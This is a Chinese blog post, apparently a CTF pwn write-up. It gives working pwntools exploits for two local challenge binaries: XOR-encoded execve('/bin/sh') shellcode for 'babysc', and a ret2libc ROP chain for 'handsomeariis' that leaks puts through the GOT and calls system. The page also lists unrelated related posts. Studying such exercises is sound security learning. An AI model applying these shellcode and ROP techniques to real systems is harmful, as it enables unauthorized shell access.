babysc和handsomeariis

原创 于 2019-03-19 21:02:57 发布 · 224 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

博客介绍从汇编角度看,逻辑是读入数据到buf,经循环函数异或后执行,注入shellcode需先异或。还提及题目开启地址随机化和堆栈不可执行,fgets存在栈溢出,思路是构造rop链,先输出puts的got地址,再泄露出system和bin,最后溢出执行system。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

babysc

在这里插入图片描述

从汇编看,逻辑就是read读入一串数据到buf,然后一个循环函数,函数控制变量i加1和buf数据进行异或,然后将异或后的数据给rdx执行,所以,直接注入shellcode,shellcode需要先异或一次再注入。

exp如下:

from pwn import *
cn = process('./babysc')
offset="\x6a\x3b\x58\x99\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
pay=""
#for循环用来异或
for i in range(len(offset)):
 pay+=chr(ord(offset[i])^(i+1))#ord()函数主要用来返回对应字符的ascii码
print pay
cn.sendline(pay)
cn.interactive()

handsomeariis
保护,开启了地址随机化和堆栈不可执行
在这里插入图片描述

题目代码
在这里插入图片描述

fgets明显栈溢出,思路是构造rop链:先跳转到puts函数,输出puts的got地址,跳到main,并通过libseacher泄露出system和bin,然后再次溢出执行system。
先查找pop rdi;ret地址,接收参数。

exp

from pwn import *
from LibcSearcher import LibcSearcher
p = process("./handsomeariis")
elf = ELF("./handsomeariis")
pop_rdi_addr= 0x400873

payload = "Aris so handsoooome!\x00"#这一句等于s2,用来控制函数执行逻辑
payload = payload.ljust(0x20 , "a") + "a" * 8
 #ljust() 返回一个原字符串左对齐,并用a填充至指定长度的新字符串。
 #如果指定的长度小于原字符串的长度则返回原字符串。
 
payload += p64(pop_rdi_addr) + p64(elf.got["puts"]) + p64(elf.plt["puts"]) + p64(0x400735)
#这里解释一下,跳转到pop rdi,将elf.got["puts"]作为参数传个rdi寄存器,调用puts函数,进而#泄露出puts的真实地址,然后返回main函数。

p.sendlineafter("Repeat me!" , payload)
p.recvuntil("Great! Power upupuppp!\n")

puts_addr = u64( p.recv(6).ljust(8, "\x00"))
#实际的操作系统中,一个地址的最高位的两个字节是00,
#而且实际栈地址一般是0x7fxxxx开头的,因此为了避免获取错误的地址值,只需要获取前面的#6字节值,然后通过ljust函数把最高位的两字节填充成00。

libc = LibcSearcher("puts" , puts_addr)
libc_base = puts_addr - libc.dump("puts")
system = libc_base + libc.dump("system")
str_bin_sh = libc_base + libc.dump("str_bin_sh")

payload = "Aris so handsoooome!\x00"
payload = payload.ljust(0x20 , "a") + "a" * 8
payload += p64(pop_rdi_addr) + p64(str_bin_sh) + p64(system)
p.sendlineafter("Repeat me!" , payload)
p.interactive()
梦回Altay
关注
HITCON-trainning&寒假做题记录
Peanuts
01-28 728
HITCON-trainning 2019.1.27 是一些好题目这几天准备重新做一遍预计两天之内完成现在做到lab7 题目地址:https://github.com/scwuaptx/HITCON-Training lab1 比较简单的逆向题这里就不贴代码了,就是一个疑惑解码 lab2 一个普通的int0x80的一个shellcode编写这里就不多讲了感觉没有什么 lab3 ret2sc 原理比...
BabyscHandsomeariis
weixin_44319142的博客
03-18 168
Babysc file一下发现这是个64位的动态文件,拖进64位ida看看 并不清楚为什么,这道神奇的题目没有办法反编译!!!只有他不可以,handsomeariis是可以反编译的。。 好的既然这样。。那就只能可怜兮兮的看汇编语言了~~~~ 看到有read函数,读入之后他进行了倒序,没看到哪里溢出。。。这里我们考虑直接利用shellcode,汇编语言可以看出来这里把输入的字符串数组值即s[i]...
CTF-PWN-babysc(Hgame)
SuperGate的博客
02-04 857
直接运行该程序,发现没有任何提示信息,随便输入一串字符之后,程序错误退出。 扔进ida查看: 程序用read函数读入buf,然后判断[rbp+var_4]0x4f的大小关系。这里可以知道[rbp+var_4]应为循环变量,buf长度为80 然后对于buf[i] ,异或buf[i]^(i+1),最后将buf蕴含的指令赋值给rdx并执行。 我们可以考虑直接构造system(/bin/sh...
rubygem-mixlib-log-3.0.9-1.el8.tar.gz
08-18
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
C# BMS上位机源码解析:串口通信与数据库存储的关键技术实现
08-18
基于C#语言开发的BMS(电池管理系统)上位机软件的关键技术。文章首先阐述了上位机软件在电池管理系统中的重要性,随后重点讲解了串口通信数据库存储两个核心技术模块的具体实现方法。对于串口通信部分,文中通过具体的C#代码示例演示了如何利用SerialPort类完成数据的读写操作,并强调了预设串口协议带来的良好扩展性。针对数据库存储方面,则展示了借助ADO.NET或Entity Framework技术实现与SQL Server数据库交互的方式,包括建立连接、执行SQL语句等步骤,从而确保能够高效地保存从串口接收到的数据,以便进一步进行数据分析处理。 适合人群:具有一定编程经验的技术人员,尤其是从事嵌入式系统、物联网设备或电池管理系统开发的相关从业者。 使用场景及目标:适用于希望深入了解C#环境下BMS上位机开发流程的学习者;旨在帮助开发者掌握串口通信数据库存储两大核心技能,提高其解决实际项目中类似问题的能力。 其他说明:文中提供的示例代码有助于读者更好地理解实践文中提到的概念技术点,在此基础上可根据自身项目的特定需求做适当调整优化。
基于MATLAB的考虑时间相关性的蒙特卡洛风电光伏功率场景生成方法 - Monte Carlo Simulation
08-18
内容概要:本文介绍了两种基于蒙特卡洛方法的风电光伏功率场景生成方法,分别是普通蒙特卡洛方法考虑时间相关性的蒙特卡洛方法。普通蒙特卡洛方法通过随机生成风速光照强度来计算功率,但未考虑时间相关性。而考虑时间相关性的蒙特卡洛方法则利用多元高斯分布构建时间相关性,从而更真实地反映风电光伏出力的变化情况。文中详细描述了这两种方法的具体步骤,并通过对比分析展示了考虑时间相关性的方法能更好地模拟实际场景。最后,通过后向削减法筛选出典型场景及其概率。 适合人群:从事电力系统规划、调度运营的专业人士,以及对风电光伏功率预测感兴趣的科研人员技术开发者。 使用场景及目标:适用于需要进行风电光伏功率预测的项目,旨在提高预测准确性,优化电力系统的运行管理。 其他说明:本文由作者原创编写,提供了详细的理论背景实施步骤,并附有参考文献供进一步研究。
MATLAB实现数字基带信号编码及功率谱分析:涵盖多种编码方式的技术详解与应用 · 编码方式
08-18
内容概要:本文档详细介绍了使用MATLAB实现常见的数字基带信号编码方法及其功率谱分析。涵盖了单极性双极性非归零码、归零码、差分码、数字双相码、密勒码、AMI码HDB3码等多种编码方式。每种编码方式都配有详细的程序注释技术文档,帮助读者理解其特性应用场景。文中还提供了具体的MATLAB代码示例,如生成基础波形的函数nrz_generator、计算并绘制功率谱的函数plot_power_spectrum以及各种编码器的具体实现。通过对不同编码方式的频谱分析,展示了它们各自的特点适用范围。 适合人群:对数字通信系统感兴趣的工程技术人员、科研人员及高校相关专业学生。 使用场景及目标:适用于希望深入了解数字基带信号编码原理及其功率谱特性的人群。通过实际编程练习,掌握不同类型编码的生成方法频谱特点,为后续研究应用打下坚实基础。 其他说明:文档不仅提供理论解释,还包括大量实用的MATLAB代码片段,便于读者动手实践。同时,通过对比不同编码方式的功率谱,直观地展示了各自的优缺点,有助于选择最适合特定应用场景的编码方式。
sane-backends-libs-1.0.27-22.el8.tar.gz
08-18
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
大学城水电管理-大学城水电管理系统源码-基于Web的大学城水电管理系统设计与实现-大学城水电管理网站代码
08-18
大学城水电管理-大学城水电管理系统-大学城水电管理系统源码-大学城水电管理系统代码-springboot大学城水电管理系统源码-基于springboot的大学城水电管理系统设计与实现-项目代码
bruce-li-anaconda3-2025
08-18
bruce-li-anaconda3-2025
rubygem-psych-3.0.2-107.module_el8.4.0+847+ee687b6c.tar.gz
08-18
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
rubygem-mocha-1.1.0-9.el8.tar.gz
08-18
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
rubygem-puppetserver-ca-doc-1.8.0-1.el8.tar.gz
08-18
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
rubygem-mini_mime-doc-1.1.0-1.el8.tar.gz
08-18
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
python图片请求客户端
08-18
python图片请求客户端
【兵器科学与技术】火炮膛内湍流对流换热数值模拟:传热系数与温度场计算模型复现及可视化分析(含详细代码及解释)
08-18
内容概要:该文档主要针对一篇关于火炮膛内旺盛湍流对流换热及温度场数值模拟研究的论文进行复现与分析。论文建立了表面传热系数、热流密度温度分布的计算模型,通过燃气温度、密度等时变参数结合Nusselt数关联式计算传热系数,求解热流密度导热量,考虑了燃气物性参数随时间变化、初始温度条件以及误差函数描述的温度分布。文档提供了详细的Python代码实现,包括数据读取、常数定义、参数计算函数(燃气导热系数、热扩散系数、雷诺数、努塞尔数、表面传热系数、室外温度、热流密度、总面积导热量)、绘图函数(绘制各参数随时间变化曲线)等步骤。; 适合人群:具备一定编程基础,对热力学、流体力学有一定了解的研究人员或工程师。; 使用场景及目标:①用于复现论文中的计算模型,验证理论研究成果;②作为教学案例,帮助学生理解复杂物理现象的数值模拟方法;③为从事相关领域的科研人员提供参考,辅助其开展类似研究。; 阅读建议:由于涉及到较多的专业术语数学公式,在阅读时应先熟悉相关背景知识,同时对照代码注释理解每一步骤的具体含义,必要时可以尝试运行代码并调整参数以加深理解。
MATLAB中HMM与Markov模型用于单变量时间序列预测的技术实现及优化方法
08-18
内容概要:本文档详细介绍了基于MATLAB平台的HMM(隐马尔科夫模型)Markov(马尔科夫模型)进行单变量时间序列预测的方法技术细节。首先,提供了完整的源代码以及配套的数据集,确保程序可以直接运行并得到预期的效果。其次,深入探讨了模型构建的关键步骤,如数据预处理(特别是强调了z-score标准化的重要性)、模型训练(包括隐藏状态数的选择及其对模型性能的影响)、以及滚动预测的具体实现方式。此外,还分享了一些实用技巧,例如通过自定义函数改进官方提供的hmmtrain函数,加入滑动窗口验证机制来提高模型鲁棒性预测精度。 适合人群:对时间序列预测感兴趣的研究人员、数据分析从业者,尤其是那些希望利用MATLAB实现HMMMarkov模型来进行实际项目开发的人士。 使用场景及目标:本资源主要用于单变量时间序列预测任务,旨在帮助用户快速搭建起能够有效工作的预测系统,同时理解背后的工作原理。具体应用场景可能涉及金融市场的趋势预测、能源消耗量估计等领域。 其他说明:文中提到的所有代码均已测试通过,可以直接应用于类似的任务中。对于想要深入了解HMMMarkov模型内部运作机制的学习者来说,这份资料也是一个很好的起点。
Python100-master (5).zip
最新发布
08-18
pycharm Python100-master (5)
【时间序列预测】项目介绍 MATLAB实现基于N-BEATS-Transformer 基于深度残差结构的预测模型(N-BEATS)结合 Transformer 编码器进行多变量时间序列预测的详细项目实
08-18
内容概要:本文档详细介绍了基于N-BEATS深度残差结构Transformer编码器的多变量时间序列预测模型的实现与应用。N-BEATS通过其独特的残差结构逐层逼近时间序列的趋势季节性成分,而Transformer编码器利用自注意力机制捕获长距离依赖关系多变量间的复杂交互。两者结合形成了一个高效的预测模型,旨在提升预测精度、泛化能力鲁棒性,并提供模型解释性支持。文档还涵盖了项目背景、目标、挑战及其解决方案,具体描述了模型架构实现细节,并提供了MATLAB代码示例,包括N-BEATS基础块、Transformer编码器层及主模型函数的定义与训练过程。 适合人群:具备一定机器学习深度学习基础的研究人员、工程师或开发者,特别是对时间序列预测MATLAB编程有一定了解的人士。 使用场景及目标:①解决多变量时间序列预测中的复杂依赖关系建模、长序列远距离依赖信息捕获、非平稳性与噪声干扰等问题;②优化计算效率与模型部署,提高模型的可扩展性适应性;③通过结合N-BEATSTransformer的优势,实现更高的预测精度更好的模型解释性。 其他说明:文档强调了模型在金融、工业、环境监测等领域的实际应用价值,同时也指出了模型训练中的计算资源效率瓶颈,并提供了相应的优化措施。项目不仅关注理论创新,更注重实际应用,为用户提供系统化的实现方案代码示例,推动MATLAB在深度学习时间序列领域的应用普及。
基于灰狼优化算法与双向长短期记忆网络的时间序列预测及参数优化(Matlab实现)
08-18
内容概要:本文探讨了一种基于灰狼优化算法(GWO)与双向长短期记忆网络(BiLSTM)的时间序列预测方法。首先介绍了灰狼优化算法的基本原理,强调其在自适应调整参数方面的作用。接着详细解释了BiLSTM网络结构的特点,特别是其在捕捉时间序列数据长期短期依赖关系方面的优势。最后,文章提供了完整的MATLAB代码实现,涵盖了从数据预处理到模型训练预测的全过程,并特别关注了学习率、隐藏层节点个数正则化参数等关键优化参数的选择。 适合人群:对时间序列预测感兴趣的科研人员、数据科学家及机器学习爱好者。 使用场景及目标:适用于需要高精度时间序列预测的应用场景,如金融、气象等领域。目标是帮助读者掌握GWO-BiLSTM模型的构建优化技巧,提升预测准确性。 阅读建议:由于涉及较多数学公式技术细节,建议读者具备一定的机器学习基础知识MATLAB编程经验。同时,在实践中可以根据具体应用场景调整优化参数,以获得最佳效果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值